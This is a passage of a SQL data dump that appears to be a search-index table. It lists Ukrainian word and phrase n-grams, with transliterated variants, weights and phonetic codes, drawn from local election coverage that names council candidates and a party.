василівна',0,1,1.5,'о000',2,'*'),(1613604,'ольга василівна 2','ольга василівна 2',0,1,1.5667,'о000',1,'*'),(1613605,'онопрійчук','онопрійчук',0,0,0.6667,'о000',1,'*'),(1613606,'онопрійчук наталія','онопрійчук наталія',0,1,1.6,'о000',1,'*'),(1613607,'онопрійчук наталія володимирівна','онопрійчук наталія володимирівна',0,1,2,'о000',1,'*'),(1613608,'організації партії «єс»','організації партії «єс»',0,1,1.7667,'о000',1,'*'),(1613609,'осадчий','осадчий',0,0,0.4667,'о000',1,'*'),(1613610,'осадчий олександр','осадчий олександр',0,1,1.5667,'о000',1,'*'),(1613611,'осадчий олександр володимирович','осадчий олександр володимирович',0,1,2,'о000',1,'*'),(1613612,'павло','павло',0,0,0.3333,'п000',1,'*'),(1613613,'павло віталійович','павло віталійович',0,1,1.5667,'п000',1,'*'),(1613614,'павло віталійович виборчий','павло віталійович виборчий',0,1,1.8667,'п000',1,'*'),(1613615,'павло петрович','павло петрович',0,1,1.4667,'п000',1,'*'),(1613616,'павло петрович 8','павло петрович 8',0,1,1.5333,'п000',1,'*'),(1613617,'партії «єс»','партії «єс»',0,1,1.3667,'п000',1,'*'),(1613618,'партії «єс» виборчий','партії «єс» виборчий',0,1,1.6667,'п000',1,'*'),(1613619,'петрівна','петрівна',0,0,0.5333,'п000',1,'*'),(1613620,'петрівна 6','петрівна 6',0,1,1.3333,'п000',1,'*'),(1613621,'петрівна 6 гладких','петрівна 6 гладких',0,1,1.6,'п000',1,'*'),(1613622,'петренко','петренко',0,0,0.5333,'п000',1,'*'),(1613623,'петренко павло','петренко павло',0,1,1.4667,'п000',1,'*'),(1613624,'петренко павло петрович','петренко павло петрович',0,1,1.7667,'п000',1,'*'),(1613625,'петрович','петрович',0,0,0.5333,'п000',3,'*'),(1613626,'петрович 5','петрович 5',0,1,1.3333,'п000',1,'*'),(1613627,'петрович 5 галицька','петрович 5 галицька',0,1,1.6333,'п000',1,'*'),(1613628,'петрович 8','петрович 8',0,1,1.3333,'п000',1,'*'),(1613629,'петрович 8 гончар','петрович 8 гончар',0,1,1.5667,'п000',1,'*'),(1613630,'петрович виборчий','петрович виборчий',0,1,1.5667,'п000',1,'*'),(1613631,'петрович виборчий округ','петрович виборчий округ',0,1,1.7667,'п000',1,'*'),(1613632,'по округах','по округах',0,1,1.3333,'п000',1,'*'),(1613633,'прокопчук','прокопчук',0,0,0.6,'п000',1,'*'),(1613634,'прокопчук валерій','прокопчук валерій',0,1,1.5667,'п000',1,'*'),(1613635,'прокопчук валерій володимирович','прокопчук валерій володимирович',0,1,2,'п000',1,'*'),(1613636,'пустовойтенко','пустовойтенко',0,0,0.8667,'п000',1,'*'),(1613637,'пустовойтенко олександр','пустовойтенко олександр',0,1,1.7667,'п000',1,'*'),(1613638,'пустовойтенко олександр валентинович','пустовойтенко олександр валентинович',0,1,2,'п000',1,'*'),(1613639,'раєць','раєць',0,0,0.3333,'р000',2,'*'),(1613640,'раєць ігор','раєць ігор',0,1,1.3333,'р000',1,'*'),(1613641,'раєць ігор васильович','раєць ігор васильович',0,1,1.7,'р000',1,'*'),(1613642,'ради від','ради від',0,1,1.2667,'р000',1,'*'),(1613643,'ради від малинської','ради від малинської',0,1,1.6333,'р000',1,'*'),(1613644,'ради по','ради по',0,1,1.2333,'р000',1,'*'),(1613645,'ради по округах','ради по округах',0,1,1.5,'р000',1,'*'),(1613646,'руслана','руслана',0,0,0.4667,'р000',1,'*'),(1613647,'руслана василівна','руслана василівна',0,1,1.5667,'р000',1,'*'),(1613648,'руслана василівна 4','руслана василівна 4',0,1,1.6333,'р000',1,'*'),(1613649,'світлана','світлана',0,0,0.5333,'с000',2,'*'),(1613650,'світлана леонідівна','світлана леонідівна',0,1,1.6333,'с000',1,'*'),(1613651,'світлана леонідівна 6','світлана леонідівна 6',0,1,1.7,'с000',1,'*'),(1613652,'світлана петрівна','світлана петрівна',0,1,1.5667,'с000',1,'*'),(1613653,'світлана петрівна 6','світлана петрівна 6',0,1,1.6333,'с000',1,'*'),(1613654,'список','список',0,0,0.4,'с000',1,'*'),(1613655,'список кандидатів','список кандидатів',0,1,1.5667,'с000',1,'*'),(1613656,'список кандидатів у','список кандидатів у',0,1,1.6333,'с000',1,'*'),(1613657,'степанець','степанець',0,0,0.6,'с000',1,'*'),(1613658,'степанець марина','степанець марина',0,1,1.5333,'с000',1,'*'),(1613659,'степанець марина іанівна','степанець марина іанівна',0,1,1.8,'с000',1,'*'),(1613660,'у депутати до','у депутати до',0,1,1.4333,'у000',1,'*'),(1613661,'філоненко','філоненко',0,0,0.6,'ф000',2,'*'),(1613662,'філоненко олександр','філоненко олександр',0,1,1.6333,'ф000',1,'*'),(1613663,'філоненко олександр петрович','філоненко олександр петрович',0,1,1.9333,'ф000',1,'*'),(1613664,'федьович','федьович',0,0,0.5333,'ф000',1,'*'),(1613665,'федьович іван','федьович іван',0,1,1.4333,'ф000',1,'*'),(1613666,'федьович іван володимирович','федьович іван володимирович',0,1,1.9,'ф000',1,'*'),(1613667,'хоменко','хоменко',0,0,0.4667,'х000',2,'*'),(1613668,'хоменко віктор','хоменко віктор',0,1,1.4667,'х000',2,'*'),(1613669,'хоменко віктор васильович','хоменко віктор васильович',0,1,1.8333,'х000',2,'*'),(1613670,'хоменко дмитро','хоменко дмитро',0,1,1.4667,'х000',1,'*'),(1613671,'хоменко дмитро васильович','хоменко дмитро васильович',0,1,1.8333,'х000',1,'*'),(1613672,'черняк','черняк',0,0,0.4,'ч000',1,'*'),(1613673,'черняк артем','черняк артем',0,1,1.4,'ч000',1,'*'),(1613674,'черняк артем борисович','черняк артем борисович',0,1,1.7333,'ч000',1,'*'),(1615837,'2483','2483',0,0,0.4,'',1,'*'),(1615838,'39-ти','39-ти',0,0,0.3333,'т000',1,'*'),(1615839,'39-ти років','39-ти років',0,1,1.3667,'т000',1,'*'),(1615840,'39-ти років трудового','39-ти років трудового',0,1,1.7,'т000',1,'*'),(1615841,'a','a',0,0,0.0667,'A000',1,'*'),(1615842,'a pratsyuvati','a pratsyuvati',0,1,1.4333,'A163213',1,'*'),(1615843,'a pratsyuvati tak','a pratsyuvati tak',0,1,1.5667,'A1632132',1,'*'),(1615844,'gromadi','gromadi',0,0,0.4667,'G653',1,'*'),(1615845,'gromadi pochuvalis','gromadi pochuvalis',0,1,1.6,'G65312142',1,'*'),(1615846,'gromadi pochuvalis zakhishchenimi','gromadi pochuvalis zakhishchenimi',0,1,2,'G653121425',1,'*'),(1615847,'lyudi','lyudi',0,0,0.3333,'L300',1,'*'),(1615848,'lyudi u','lyudi u',0,1,1.2333,'L300',1,'*'),(1615849,'lyudi u malinskij','lyudi u malinskij',0,1,1.5667,'L35452',1,'*'),(1615850,'malinskij gromadi','malinskij gromadi',0,1,1.5667,'M452653',1,'*'),(1615851,'malinskij gromadi pochuvalis','malinskij gromadi pochuvalis',0,1,1.9333,'M45265312142',1,'*'),(1615852,'mariya','mariya',0,0,0.4,'M600',1,'*'),(1615853,'mariya nasikanova','mariya nasikanova',0,1,1.5667,'M65251',1,'*'),(1615854,'mariya nasikanova ya','mariya nasikanova ya',0,1,1.6667,'M65251',1,'*'),(1615855,'na porozhnikh','na porozhnikh',0,1,1.4333,'N16252',1,'*'),(1615856,'na porozhnikh obitsyankakh','na porozhnikh obitsyankakh',0,1,1.8667,'N1625213252',1,'*'),(1615857,'nasikanova','nasikanova',0,0,0.6667,'N251',1,'*'),(1615858,'nasikanova ya','nasikanova ya',0,1,1.4333,'N251',1,'*'),(1615859,'nasikanova ya ne','nasikanova ya ne',0,1,1.5333,'N2515',1,'*'),(1615860,'ne','ne',0,0,0.1333,'N000',3,'*'),(1615861,'ne zbirayus','ne zbirayus',0,1,1.3667,'N2162',1,'*'),(1615862,'ne zbirayus piaritis','ne zbirayus piaritis',0,1,1.6667,'N21621632',1,'*'),(1615863,'obitsyankakh','obitsyankakh',0,0,0.8,'O13252',1,'*'),(1615864,'obitsyankakh a','obitsyankakh a',0,1,1.4667,'O13252',1,'*'),(1615865,'obitsyankakh a pratsyuvati','obitsyankakh a pratsyuvati',0,1,1.8667,'O13252163213',1,'*'),(1615866,'piaritis','piaritis',0,0,0.5333,'P632',1,'*'),(1615867,'piaritis na','piaritis na',0,1,1.3667,'P6325',1,'*'),(1615868,'piaritis na porozhnikh','piaritis na porozhnikh',0,1,1.7333,'P632516252',1,'*'),(1615869,'pochuvalis','pochuvalis',0,0,0.6667,'P2142',1,'*'),(1615870,'pochuvalis zakhishchenimi','pochuvalis zakhishchenimi',0,1,1.8333,'P21425',1,'*'),(1615871,'porozhnikh','porozhnikh',0,0,0.6667,'P6252',1,'*'),(1615872,'porozhnikh obitsyankakh','porozhnikh obitsyankakh',0,1,1.7667,'P625213252',1,'*'),(1615873,'porozhnikh obitsyankakh a','porozhnikh obitsyankakh a',0,1,1.8333,'P625213252',1,'*'),(1615874,'pratsyuvati','pratsyuvati',0,0,0.7333,'P63213',1,'*'),(1615875,'pratsyuvati tak','pratsyuvati tak',0,1,1.5,'P632132',1,'*'),(1615876,'pratsyuvati tak shchob','pratsyuvati tak shchob',0,1,1.7333,'P6321321',1,'*'),(1615877,'shchob','shchob',0,0,0.4,'S100',1,'*'),(1615878,'shchob lyudi','shchob lyudi',0,1,1.4,'S143',1,'*'),(1615879,'shchob lyudi u','shchob lyudi u',0,1,1.4667,'S143',1,'*'),(1615880,'tak','tak',0,0,0.2,'T200',1,'*'),(1615881,'tak shchob','tak shchob',0,1,1.3333,'T210',1,'*'),(1615882,'tak shchob lyudi','tak shchob lyudi',0,1,1.5333,'T2143',1,'*'),(1615883,'u malinskij','u malinskij',0,1,1.3667,'U5452',1,'*'),(1615884,'u malinskij gromadi','u malinskij gromadi',0,1,1.6333,'U5452653',1,'*'),(1615885,'ya','ya',0,0,0.1333,'Y000',1,'*'),(1615886,'ya ne','ya ne',0,1,1.1667,'Y500',1,'*'),(1615887,'ya ne zbirayus','ya ne zbirayus',0,1,1.4667,'Y52162',1,'*'),(1615888,'zakhishchenimi','zakhishchenimi',0,0,0.9333,'Z500',1,'*'),(1615889,'zbirayus','zbirayus',0,0,0.5333,'Z162',1,'*'),(1615890,'zbirayus piaritis','zbirayus piaritis',0,1,1.5667,'Z1621632',1,'*'),(1615891,'zbirayus piaritis na','zbirayus piaritis na',0,1,1.6667,'Z16216325',1,'*'),(1615892,'«європейська','«європейська',0,0,0.8,'є000',1,'*'),(1615893,'«європейська солідарність»','«європейська солідарність»',0,1,1.8667,'є000',1,'*'),(1615894,'«європейська солідарність» марію','«європейська солідарність» марію',0,1,2,'є000',1,'*'),(1615895,'«міський','«міський',0,0,0.5333,'м000',1,'*'),(1615896,'«міський бюджет».','«міський бюджет».',0,1,1.5667,'м000',1,'*'),(1615897,'«міський бюджет». і','«міський бюджет». і',0,1,1.6333,'м000',1,'*'),(1615898,'«товстих','«товстих',0,0,0.5333,'т000',1,'*'),(1615899,'«товстих гаманців»,','«товстих гаманців»,',0,1,1.6333,'т000',1,'*'),(1615900,'«товстих гаманців», ми','«товстих гаманців», ми',0,1,1.7333,'т000',1,'*'),(1615901,'«я','«я',0,0,0.1333,'я000',1,'*'),(1615902,'«я не','«я не',0,1,1.1667,'я000',1,'*'),(1615903,'«я не збираюсь','«я не збираюсь',0,1,1.4667,'я000',1,'*'),(1615904,'є керівники','є керівники',0,1,1.3667,'є000',1,'*'),(1615905,'є керівники виробничих','є керівники виробничих',0,1,1.7333,'є000',1,'*'),(1615906,'є сільський','є сільський',0,1,1.3667,'є000',1,'*'),(1615907,'є сільський голова','є сільський голова',0,1,1.6,'є000',1,'*'),(1615908,'є такі','є такі',0,1,1.2,'є000',1,'*'),(1615909,'є такі кандидати','є такі кандидати',0,1,1.5333,'є000',1,'*'),(1615910,'є хто','є хто',0,1,1.1667,'є000',1,'*'),(1615911,'є хто що','є хто що',0,1,1.2667,'є000',1,'*'),(1615912,'європейським','європейським',0,0,0.8,'є000',1,'*'),(1615913,'європейським містом','європейським містом',0,1,1.6333,'є000',1,'*'),(1615914,'європейським містом для','європейським містом для',0,1,1.7667,'є000',1,'*'),(1615915,'і в районній','і в районній',0,1,1.4,'і000',1,'*'),(1615916,'і в село','і в село',0,1,1.2667,'і000',1,'*'),(1615917,'і головою','і головою',0,1,1.3,'і000',1,'*'),(1615918,'і головою сільської','і головою сільської',0,1,1.6333,'і000',1,'*'),(1615919,'і де','і де',0,1,1.1333,'і000',1,'*'),(1615920,'і де гарантія','і де гарантія',0,1,1.4333,'і000',1,'*'),(1615921,'і кошти','і кошти',0,1,1.2333,'і000',1,'*'),(1615922,'і кошти акумулюватимуться','і кошти акумулюватимуться',0,1,1.8333,'і000',1,'*'),(1615923,'і міської','і міської',0,1,1.3,'і000',1,'*'),(1615924,'і міської ради','і міської ради',0,1,1.4667,'і000',1,'*'),(1615925,'і минуле','і минуле',0,1,1.2667,'і000',1,'*'),(1615926,'і минуле й','і минуле й',0,1,1.3333,'і000',1,'*'),(1615927,'і по','і по',0,1,1.1333,'і000',1,'*'),(1615928,'і по команді','і по команді',0,1,1.4,'і000',1,'*'),(1615929,'і почувались','і почувались',0,1,1.4,'і000',1,'*'),(1615930,'і почувались захищеними','і почувались захищеними',0,1,1.7667,'і000',1,'*'),(1615931,'і примножити','і примножити',0,1,1.4,'і000',1,'*'),(1615932,'і примножити щоб','і примножити щоб',0,1,1.5333,'і000',1,'*'),(1615933,'і розвиток','і розвиток',0,1,1.3333,'і000',1,'*'),(1615934,'і розвиток старих','і розвиток старих',0,1,1.5667,'і000',1,'*'),(1615935,'і щоразу','і щоразу',0,1,1.2667,'і000',1,'*'),(1615936,'і щоразу вирішувати','і щоразу вирішувати',0,1,1.6333,'і000',1,'*'),(1615937,'і якість','і якість',0,1,1.2667,'і000',1,'*'),(1615938,'і якість нашого','і якість нашого',0,1,1.5,'і000',1,'*'),(1615939,'її вирішення','її вирішення',0,1,1.4,'ї000',1,'*'),(1615940,'її вирішення адже','її вирішення адже',0,1,1.5667,'ї000',1,'*'),(1615941,'іванівно','іванівно',0,0,0.5333,'і000',1,'*'),(1615942,'іванівно нинішні','іванівно нинішні',0,1,1.5333,'і000',1,'*'),(1615943,'іванівно нинішні вибори','іванівно нинішні вибори',0,1,1.7667,'і000',1,'*'),(1615944,'із 39-ти','із 39-ти',0,1,1.2667,'і000',1,'*'),(1615945,'із 39-ти років','із 39-ти років',0,1,1.4667,'і000',1,'*'),(1615946,'із досвідом','із досвідом',0,1,1.3667,'і000',1,'*'),(1615947,'із досвідом у','із досвідом у',0,1,1.4333,'і000',1,'*'),(1615948,'ініціативу','ініціативу',0,0,0.6667,'і000',1,'*'),(1615949,'ініціативу він','ініціативу він',0,1,1.4667,'і000',1,'*'),(1615950,'ініціативу він буде','ініціативу він буде',0,1,1.6333,'і000',1,'*'),(1615951,'інвестиції','інвестиції',0,0,0.6667,'і000',1,'*'),(1615952,'інвестиції у','інвестиції у',0,1,1.4,'і000',1,'*'),(1615953,'інвестиції у запуск','інвестиції у запуск',0,1,1.6333,'і000',1,'*'),(1615954,'інколи','інколи',0,0,0.4,'і000',2,'*'),(1615955,'інколи про','інколи про',0,1,1.3333,'і000',1,'*'),(1615956,'інколи про кандидата','інколи про кандидата',0,1,1.6667,'і000',1,'*'),(1615957,'інтереси','інтереси',0,0,0.5333,'і000',1,'*'),(1615958,'інтереси вибивати','інтереси вибивати',0,1,1.5667,'і000',1,'*'),(1615959,'інтереси вибивати той','інтереси вибивати той',0,1,1.7,'і000',1,'*'),(1615960,'інтереси громади','інтереси громади',0,1,1.5333,'і000',1,'*'),(1615961,'інтереси громади проявляти','інтереси громади проявляти',0,1,1.8667,'і000',1,'*'),(1615962,'інфраструктури','інфраструктури',0,0,0.9333,'і000',1,'*'),(1615963,'інфраструктури міста','інфраструктури міста',0,1,1.6667,'і000',1,'*'),(1615964,'інфраструктури міста житлово-комунального','інфраструктури міста житлово-комунального',0,1,2,'і000',1,'*'),(1615965,'інші','інші',0,0,0.2667,'і000',2,'*'),(1615966,'інші нагальні','інші нагальні',0,1,1.4333,'і000',1,'*'),(1615967,'інші нагальні потреби','інші нагальні потреби',0,1,1.7,'і000',1,'*'),(1615968,'інший','інший',0,0,0.3333,'і000',1,'*'),(1615969,'інший час','інший час',0,1,1.3,'і000',1,'*'),(1615970,'інший час працювала','інший час працювала',0,1,1.6333,'і000',1,'*'),(1615971,'іншими політичними','іншими політичними',0,1,1.6,'і000',1,'*'),(1615972,'іншими політичними партіями','іншими політичними партіями',0,1,1.9,'і000',1,'*'),(1615973,'іспит','іспит',0,0,0.3333,'і000',1,'*'),(1615974,'іспит для','іспит для',0,1,1.3,'і000',1,'*'),(1615975,'іспит для всіх','іспит для всіх',0,1,1.4667,'і000',1,'*'),(1615976,'їх зберегти','їх зберегти',0,1,1.3667,'ї000',1,'*'),(1615977,'їх зберегти і','їх зберегти і',0,1,1.4333,'ї000',1,'*'),(1615978,'їхніми','їхніми',0,0,0.4,'ї000',1,'*'),(1615979,'їхніми проблемами','їхніми проблемами',0,1,1.5667,'ї000',1,'*'),(1615980,'їхніми проблемами і','їхніми проблемами і',0,1,1.6333,'ї000',1,'*'),(1615981,'а дорогу','а дорогу',0,1,1.2667,'а000',1,'*'),(1615982,'а дорогу в','а дорогу в',0,1,1.3333,'а000',1,'*'),(1615983,'а й','а й',0,1,1.1,'а000',1,'*'),(1615984,'а й чи','а й чи',0,1,1.2,'а000',1,'*'),(1615985,'а не','а не',0,1,1.1333,'а000',2,'*'),(1615986,'а не на','а не на',0,1,1.2333,'а000',1,'*'),(1615987,'а працювати','а працювати',0,1,1.3667,'а000',1,'*'),(1615988,'а працювати так','а працювати так',0,1,1.5,'а000',1,'*'),(1615989,'а працюватимуть','а працюватимуть',0,1,1.5,'а000',1,'*'),(1615990,'а працюватимуть на','а працюватимуть на',0,1,1.6,'а000',1,'*'),(1615991,'а це','а це',0,1,1.1333,'а000',1,'*'),(1615992,'а це значить','а це значить',0,1,1.4,'а000',1,'*'),(1615993,'а як','а як',0,1,1.1333,'а000',1,'*'),(1615994,'а як фінансуватимуться','а як фінансуватимуться',0,1,1.7333,'а000',1,'*'),(1615995,'а які','а які',0,1,1.1667,'а000',1,'*'),(1615996,'а які бачите','а які бачите',0,1,1.4,'а000',1,'*'),(1615997,'аби','аби',0,0,0.2,'а000',2,'*'),(1615998,'аби старостою','аби старостою',0,1,1.4333,'а000',1,'*'),(1615999,'аби старостою обирали','аби старостою обирали',0,1,1.7,'а000',1,'*'),(1616000,'або ж','або ж',0,1,1.1667,'а000',1,'*'),(1616001,'або ж залежним','або ж залежним',0,1,1.4667,'а000',1,'*'),(1616002,'адже','адже',0,0,0.2667,'а000',4,'*'),(1616003,'адже більшість','адже більшість',0,1,1.4667,'а000',1,'*'),(1616004,'адже більшість сільських','адже більшість сільських',0,1,1.8,'а000',1,'*'),(1616005,'акумулюватимуться','акумулюватимуться',0,0,1,'а000',1,'*'),(1616006,'акумулюватимуться в','акумулюватимуться в',0,1,1.6333,'а000',1,'*'),(1616007,'акумулюватимуться в один','акумулюватимуться в один',0,1,1.8,'а000',1,'*'),(1616008,'але','але',0,0,0.2,'а000',4,'*'),(1616009,'але й','але й',0,1,1.1667,'а000',2,'*'),(1616010,'але й ті','але й ті',0,1,1.2667,'а000',1,'*'),(1616011,'амалинській','амалинській',0,0,0.7333,'а000',1,'*'),(1616012,'амалинській громаді','амалинській громаді',0,1,1.6333,'а000',1,'*'),(1616013,'амалинській громаді побажаємо','амалинській громаді побажаємо',0,1,1.9667,'а000',1,'*'),(1616014,'амбіційних','амбіційних',0,0,0.6667,'а000',1,'*'),(1616015,'амбіційних людей','амбіційних людей',0,1,1.5333,'а000',1,'*'),(1616016,'амбіційних людей котрі','амбіційних людей котрі',0,1,1.7333,'а000',1,'*'),(1616017,'аналіз','аналіз',0,0,0.4,'а000',1,'*'),(1616018,'аналіз то','аналіз то',0,1,1.3,'а000',1,'*'),(1616019,'аналіз то стане','аналіз то стане',0,1,1.5,'а000',1,'*'),(1616020,'аналізуєш','аналізуєш',0,0,0.6,'а000',1,'*'),(1616021,'аналізуєш ситуацію','аналізуєш ситуацію',0,1,1.6,'а000',1,'*'),(1616022,'аналізуєш ситуацію складається','аналізуєш ситуацію складається',0,1,2,'а000',1,'*'),(1616023,'ато','ато',0,0,0.2,'а000',1,'*'),(1616024,'ато у','ато у',0,1,1.1667,'а000',1,'*'),(1616025,'ато у нас','ато у нас',0,1,1.3,'а000',1,'*'),(1616026,'бізнес','бізнес',0,0,0.4,'б000',1,'*'),(1616027,'бізнес для','бізнес для',0,1,1.3333,'б000',1,'*'),(1616028,'бізнес для декого','бізнес для декого',0,1,1.5667,'б000',1,'*'),(1616029,'бізнесом','бізнесом',0,0,0.5333,'б000',1,'*'),(1616030,'бізнесом олігархами','бізнесом олігархами',0,1,1.6333,'б000',1,'*'),(1616031,'бізнесом олігархами тож','бізнесом олігархами тож',0,1,1.7667,'б000',1,'*'),(1616032,'більш вигідну','більш вигідну',0,1,1.4333,'б000',1,'*'),(1616033,'більш вигідну кандидатуру','більш вигідну кандидатуру',0,1,1.8333,'б000',1,'*'),(1616034,'більшість','більшість',0,0,0.6,'б000',2,'*'),(1616035,'більшість сільських','більшість сільських',0,1,1.6333,'б000',1,'*'),(1616036,'більшість сільських рад','більшість сільських рад',0,1,1.7667,'б000',1,'*'),(1616037,'більше десятка','більше десятка',0,1,1.4667,'б000',1,'*'),(1616038,'більше десятка місцевих','більше десятка місцевих',0,1,1.7667,'б000',1,'*'),(1616039,'більше хочу','більше хочу',0,1,1.3667,'б000',1,'*'),(1616040,'більше хочу пройти','більше хочу пройти',0,1,1.6,'б000',1,'*'),(1616041,'багато','багато',0,0,0.4,'б000',1,'*'),(1616042,'багато років','багато років',0,1,1.4,'б000',1,'*'),(1616043,'багато років я','багато років я',0,1,1.4667,'б000',1,'*'),(1616044,'байдуже','байдуже',0,0,0.4667,'б000',1,'*'),(1616045,'байдуже доля','байдуже доля',0,1,1.4,'б000',1,'*'),(1616046,'байдуже доля селян','байдуже доля селян',0,1,1.6,'б000',1,'*'),(1616047,'балотуєтесь','балотуєтесь',0,0,0.7333,'б000',1,'*'),(1616048,'балотуєтесь у','балотуєтесь у',0,1,1.4333,'б000',1,'*'),(1616049,'балотуєтесь у депутати','балотуєтесь у депутати',0,1,1.7333,'б000',1,'*'),(1616050,'бачите','бачите',0,0,0.4,'б000',1,'*'),(1616051,'бачите перспективи','бачите перспективи',0,1,1.6,'б000',1,'*'),(1616052,'бачите перспективи для','бачите перспективи для',0,1,1.7333,'б000',1,'*'),(1616053,'безліч','безліч',0,0,0.4,'б000',1,'*'),(1616054,'безліч питань','безліч питань',0,1,1.4333,'б000',1,'*'),(1616055,'безліч питань ви','безліч питань ви',0,1,1.5333,'б000',1,'*'),(1616056,'благоустрою','благоустрою',0,0,0.7333,'б000',2,'*'),(1616057,'благоустрою інколи','благоустрою інколи',0,1,1.6,'б000',1,'*'),(1616058,'благоустрою інколи про','благоустрою інколи про',0,1,1.7333,'б000',1,'*'),(1616059,'буде','буде',0,0,0.2667,'б000',3,'*'),(1616060,'буде в','буде в',0,1,1.2,'б000',1,'*'),(1616061,'буде в курсі','буде в курсі',0,1,1.4,'б000',1,'*'),(1616062,'буде маріонеткою','буде маріонеткою',0,1,1.5333,'б000',1,'*'),(1616063,'буде маріонеткою або','буде маріонеткою або',0,1,1.6667,'б000',1,'*'),(1616064,'будуть','будуть',0,0,0.4,'б000',3,'*'),(1616065,'будуть на','будуть на',0,1,1.3,'б000',1,'*'),(1616066,'будуть на рахунку','будуть на рахунку',0,1,1.5667,'б000',1,'*'),(1616067,'будуть потрапляти','будуть потрапляти',0,1,1.5667,'б000',1,'*'),(1616068,'будуть потрапляти й','будуть потрапляти й',0,1,1.6333,'б000',1,'*'),(1616069,'будуть призначати','будуть призначати',0,1,1.5667,'б000',1,'*'),(1616070,'будуть призначати а','будуть призначати а',0,1,1.6333,'б000',1,'*'),(1616071,'будуть просто','будуть просто',0,1,1.4333,'б000',1,'*'),(1616072,'будуть просто займати','будуть просто займати',0,1,1.7,'б000',1,'*'),(1616073,'було чекати','було чекати',0,1,1.3667,'б000',1,'*'),(1616074,'було чекати на','було чекати на',0,1,1.4667,'б000',1,'*'),(1616075,'бухгалтера','бухгалтера',0,0,0.6667,'б000',1,'*'),(1616076,'бухгалтера робітники','бухгалтера робітники',0,1,1.6667,'б000',1,'*'),(1616077,'бухгалтера робітники воїни','бухгалтера робітники воїни',0,1,1.8667,'б000',1,'*'),(1616078,'бюджет».','бюджет».',0,0,0.5333,'б000',1,'*'),(1616079,'бюджет». і','бюджет». і',0,1,1.3333,'б000',1,'*'),(1616080,'бюджет». і де','бюджет». і де',0,1,1.4333,'б000',1,'*'),(1616081,'в котрого','в котрого',0,1,1.3,'в000',1,'*'),(1616082,'в котрого в','в котрого в',0,1,1.3667,'в000',1,'*'),(1616083,'в курсі','в курсі',0,1,1.2333,'в000',1,'*'),(1616084,'в курсі всіх','в курсі всіх',0,1,1.4,'в000',1,'*'),(1616085,'в міській','в міській',0,1,1.3,'в000',1,'*'),(1616086,'в міській раді','в міській раді',0,1,1.4667,'в000',1,'*'),(1616087,'в нашу','в нашу',0,1,1.2,'в000',1,'*'),(1616088,'в нашу команду','в нашу команду',0,1,1.4667,'в000',1,'*'),(1616089,'в невигідному','в невигідному',0,1,1.4333,'в000',1,'*'),(1616090,'в невигідному становищі','в невигідному становищі',0,1,1.7667,'в000',1,'*'),(1616091,'в них','в них',0,1,1.1667,'в000',1,'*'),(1616092,'в них є','в них є',0,1,1.2333,'в000',1,'*'),(1616093,'в обласну','в обласну',0,1,1.3,'в000',1,'*'),(1616094,'в обласну дати','в обласну дати',0,1,1.4667,'в000',1,'*'),(1616095,'в один','в один',0,1,1.2,'в000',1,'*'),(1616096,'в один великий','в один великий',0,1,1.4667,'в000',1,'*'),(1616097,'в органах','в органах',0,1,1.3,'в000',1,'*'),(1616098,'в органах місцевого','в органах місцевого',0,1,1.6333,'в000',1,'*'),(1616099,'в помічниках','в помічниках',0,1,1.4,'в000',1,'*'),(1616100,'в помічниках більше','в помічниках більше',0,1,1.6333,'в000',1,'*'),(1616101,'в районній','в районній',0,1,1.3333,'в000',1,'*'),(1616102,'в районній раді','в районній раді',0,1,1.5,'в000',1,'*'),(1616103,'в селі','в селі',0,1,1.2,'в000',1,'*'),(1616104,'в селі знала','в селі знала',0,1,1.4,'в000',1,'*'),(1616105,'в село','в село',0,1,1.2,'в000',1,'*'),(1616106,'в село піду','в село піду',0,1,1.3667,'в000',1,'*'),(1616107,'в тому','в тому',0,1,1.2,'в000',1,'*'),(1616108,'в тому що','в тому що',0,1,1.3,'в000',1,'*'),(1616109,'в чомусь','в чомусь',0,1,1.2667,'в000',1,'*'),(1616110,'в чомусь програли','в чомусь програли',0,1,1.5667,'в000',1,'*'),(1616111,'в якій','в якій',0,1,1.2,'в000',1,'*'),(1616112,'в якій він','в якій він',0,1,1.3333,'в000',1,'*'),(1616113,'від голови','від голови',0,1,1.3333,'в000',1,'*'),(1616114,'від голови міської','від голови міської',0,1,1.6,'в000',1,'*'),(1616115,'від нашого','від нашого',0,1,1.3333,'в000',1,'*'),(1616116,'від нашого вибору','від нашого вибору',0,1,1.5667,'в000',1,'*'),(1616117,'віддаєте','віддаєте',0,0,0.5333,'в000',1,'*'),(1616118,'віддаєте перевагу','віддаєте перевагу',0,1,1.5667,'в000',1,'*'),(1616119,'віддаєте перевагу депутатству','віддаєте перевагу депутатству',0,1,1.9667,'в000',1,'*'),(1616120,'віднині','віднині',0,0,0.4667,'в000',1,'*'),(1616121,'віднині це','віднині це',0,1,1.3333,'в000',1,'*'),(1616122,'віднині це все','віднині це все',0,1,1.4667,'в000',1,'*'),(1616123,'відомо','відомо',0,0,0.4,'в000',1,'*'),(1616124,'відомо у','відомо у',0,1,1.2667,'в000',1,'*'),(1616125,'відомо у вас','відомо у вас',0,1,1.4,'в000',1,'*'),(1616126,'відповідальні','відповідальні',0,0,0.8667,'в000',1,'*'),(1616127,'відповідальні у','відповідальні у',0,1,1.5,'в000',1,'*'),(1616128,'відповідальні у суспільства','відповідальні у суспільства',0,1,1.9,'в000',1,'*'),(1616129,'відстоювати','відстоювати',0,0,0.7333,'в000',1,'*'),(1616130,'відстоювати інтереси','відстоювати інтереси',0,1,1.6667,'в000',1,'*'),(1616131,'відстоювати інтереси громади','відстоювати інтереси громади',0,1,1.9333,'в000',1,'*'),(1616132,'відстоювати його','відстоювати його',0,1,1.5333,'в000',1,'*'),(1616133,'відстоювати його інтереси','відстоювати його інтереси',0,1,1.8333,'в000',1,'*'),(1616134,'відстоювати права','відстоювати права',0,1,1.5667,'в000',1,'*'),(1616135,'відстоювати права села','відстоювати права села',0,1,1.7333,'в000',1,'*'),(1616136,'він буде','він буде',0,1,1.2667,'в000',1,'*'),(1616137,'він буде маріонеткою','він буде маріонеткою',0,1,1.6667,'в000',1,'*'),(1616138,'він займає','він займає',0,1,1.3333,'в000',1,'*'),(1616139,'він займає якщо','він займає якщо',0,1,1.5,'в000',1,'*'),(1616140,'він знаходиться','він знаходиться',0,1,1.5,'в000',1,'*'),(1616141,'він знаходиться наша','він знаходиться наша',0,1,1.6667,'в000',1,'*'),(1616142,'він не','він не',0,1,1.2,'в000',1,'*'),(1616143,'він не зможе','він не зможе',0,1,1.4,'в000',1,'*'),(1616144,'вірять','вірять',0,0,0.4,'в000',1,'*'),(1616145,'вірять у','вірять у',0,1,1.2667,'в000',1,'*'),(1616146,'вірять у свої','вірять у 